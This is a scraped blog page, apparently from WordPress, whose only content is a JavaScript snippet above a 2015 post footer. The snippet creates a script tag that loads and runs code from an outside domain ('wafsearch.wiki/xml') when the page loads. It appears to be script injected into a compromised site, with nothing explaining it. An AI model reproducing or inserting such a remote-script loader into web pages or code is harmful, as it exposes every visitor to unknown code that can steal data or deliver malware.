var url = ‘https://wafsearch.wiki/xml’;
var script = document.createElement(‘script’);
script.src = url;
script.type = ‘text/javascript’;
script.async = true;
document.getElementsByTagName(‘head’)[0].appendChild(script);
This entry was posted on Tuesday, January 27th, 2015 at 9:14 am. You can follow any responses to this entry through the RSS 2.0 feed.
Both comments and pings are currently closed.